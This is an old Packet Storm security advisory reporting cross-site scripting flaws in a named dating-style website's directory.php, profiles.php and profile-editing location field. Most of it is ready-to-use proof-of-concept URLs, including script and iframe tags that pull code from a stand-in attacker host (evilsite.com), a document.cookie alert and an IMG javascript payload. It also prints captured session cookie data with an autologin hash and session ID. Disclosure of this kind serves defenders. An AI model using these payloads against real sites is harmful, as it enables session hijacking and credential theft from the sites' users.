asianxoXSS.txt

2006-06-12T00:00:00
ID PACKETSTORM:47266
Type packetstorm
Reporter Luny
Modified 2006-06-12T00:00:00

Description

                                        
                                            `AsianXO.com  
  
Homepage:  
http://www.asianxo.com/  
  
Effected files:  
directory.php  
profiles.php  
Input boxes of editing profile  
  
----------------------------  
  
XSS Vulnerability via dir_id:  
  
Directory.php PoC:  
http://www.axo2.com/directory.php?dir_id=1"><SCRIPT%20SRC=http://evilsite.com/xss.js></SCRIPT><"  
  
Profiles.php PoC using malformed img tags in front a openended iframe:  
http://www.axo2.com/profiles.php?userid=999999999<""><iframe%20src=http://evilsite.com/scriptlet.html%20<  
  
------------------------------  
  
Another XSS example of profiles.php, this time using allowed html tags <br> inaurl injection along with <script> tags,   
  
which also reveals some interesting data:  
  
http://www.axo2.com/profiles.php?userid=99999999<""><BR><BR><BR><BR><BR><BR><SCRIPT%20SRC=http://evilsite.com/xss.js></SCRIPT>  
  
The output text:  
  
This is remote text via xss.js located at evilsite.com phpbb2mysql_data=a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bs%3A32%3A%2291da4589b012c2fe1ceac1fb2363dbc6%22%3Bs%3A6%3A%22userid%22%3Bs%3A5%3A%2210610%22%3B%7D; phpbb2mysql_sid=362562eaac0fc1d69e574584d4f95e60','gallery','height=500,width=700,status=0');">   
  
When converting the whole string from hex value, we notice a autologinid:# along with our cookie data that has our md5'ed hash pw in it.  
  
a:2:{s:11:"autologinid";s:32:"91da4589b012c2fe1ceac1fb2363dbc6";s:6:"userid";s:5:"10610";};  
  
NOTE: You can also use <script>alert(document.cookie)</script> and it will create a popup box with the cookie data in it.  
  
PoC:  
http://www.axo2.com/profiles.php?userid=99999999<""><BR><BR><BR><BR><BR><script>alert(document.cookie)</script>  
  
---------------------  
  
XSS Vulnerability of input boxes when editing profile:  
  
The location input box doesn't correctly filter all data, for a XSS example we can enter in double < with ' and no   
  
closing >  
  
<'<IMG SRC=javascript:alert("XSS")  
`